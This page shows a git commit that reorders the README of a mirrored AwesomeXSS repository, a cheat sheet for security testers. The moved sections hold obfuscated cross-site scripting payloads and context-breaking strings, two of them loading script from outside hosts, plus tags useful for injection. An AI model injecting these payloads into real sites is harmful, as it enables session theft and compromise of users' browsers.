Mirrors/AwesomeXSS
2
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity

rearranged the sections

Browse source
This commit is contained in:
Somdev Sangwan 2018-03-22 18:34:27 +05:30 committed by GitHub
parent 9f0aa00471
commit 9790ba8caf
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 33 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

67
README.md
View file

@ -32,6 +32,40 @@ Put this repo on watch. I will be updating it regularly.
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)
### Awesome Payloads
```
<--`<img/src=` onerror=alert(1)> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg/x=">"/onload=confirm()//
<svg </onload ="1> (_=prompt,_(1)) "">
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<details ontoggle=confirm()>
<svg onload=write()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
```
Some HTML Tags that you will be using
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
### Awesome Context Breaking
#### Simple Context
@ -56,24 +90,6 @@ Put this repo on watch. I will be updating it regularly.
</script><svg onload=alert()>
```
### Awesome Payloads
```
<--`<img/src=` onerror=alert(1)> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg/x=">"/onload=confirm()//
<svg </onload ="1> (_=prompt,_(1)) "">
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<details ontoggle=confirm()>
<svg onload=write()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
```
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
@ -90,21 +106,6 @@ A good compilation of advanced XSS exploits can be found [here](http://www.xss-p
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
Some HTML Tags that you will be using
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
### Awesome Probing
If nothing of this works, take a look at **Awesome Bypassing** section